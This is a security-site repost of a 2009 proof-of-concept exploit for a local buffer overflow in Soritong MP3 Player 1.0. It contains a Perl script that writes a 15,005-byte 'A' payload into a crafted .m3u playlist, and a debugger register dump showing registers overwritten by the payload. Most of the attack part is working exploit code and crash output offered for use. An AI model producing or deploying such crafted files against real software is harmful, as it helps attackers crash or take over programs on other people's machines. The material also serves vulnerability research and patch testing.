首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Soritong MP3 Player version 1.0 local buffer overflow proof of concept exploit t
来源:the_3dit0r[at]yahoo.com 作者:the_Edit0r 发布时间:2009-09-16  
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""  :::::: ::   ::       ::        ::  ::  ::::        """
"""  ::      :: ::        :: :::::: .. ::::   ::        """
"""  :::::    :::   ::::: :: ::  :: ::  ::  ::::        """
"""  ::      :: ::  ::  : :: ::  :: ::  ::    ::        """
"""  :::::: ::   :: ::::: :: :::::: ::  ::  :::: rs.ir  """
"""                 ::                                  """
"""                                                     """
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
   Anti-Security Research Team & Security Institute

#[+] Bug : Soritong MP3 Player 1.0 (.M3U) Local Buffer Overflow 
#[+] program  Download : http://www.sorinara.com/
#[+] Author : the_Edit0r
#[+] Contact me : the_3dit0r[at]Yahoo[dot]coM
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP2 
#[+] web site: Expl0iters.ir  * Anti-security.ir
#[+] Big thnx: Aria-Security Team & H4ckcity Member


# Part Description :
--------------------

For More Explaination look at follow pictures.

I. Clicking On File Perl
http://expl0iters.ir/img/SMP1.jpg

II.Edit0r.M3U File Created Successfully
http://expl0iters.ir/img/SMP2.jpg

III.Run the Program FotoTagger & add File Edit0r.M3U ( include Edit0r.M3U File ) 
http://expl0iters.ir/img/SMP3.jpg
http://expl0iters.ir/img/SMP4.jpg

IV.Boom ...!!!



------------------------------------

EAX 00000041
ECX 00000041
EDX 00130000 ASCII "Actx "
EBX 001AB474 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESP 0012FA74
EBP 0012FCAC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESI 00000003
EDI 0047BEDC SoriTong.0047BEDC
EIP 0040C55F SoriTong.0040C55F

# Part Expl0it & Bug Codes ( Poc ) : 
------------------------------------

#!/usr/bin/perl
my $buffer = "A" x 15005;
my $filename = "Edit0r.m3u";
open (FILE,">$filename") || die "\nCan't open $file: $!";
print FILE "$buffer";
close (FILE);
print "\nSuccessfully!\n";

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Installshield 2009 Premier ver
·DJ Studio Pro 4.2 (.PLS file)
·BigAnt Server 2.50 SP1 (ZIP Fi
·BigAnt Server 2.50 GET Request
·Joomla Component com_jlord_rss
·MP3 Collector 2.3 (m3u File) L
·Saphplesson 4.3 Remote Blind S
·SAP Player 0.9 (.pla) Universa
·Notepad++ 5.4.5 Local .C/CPP S
·VLC Media Player < 0.9.6 (CUE)
·Quiksoft EasyMail 6.0.3.0 imap
·EasyMail Quicksoft 6.0.2.0 (Cr
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved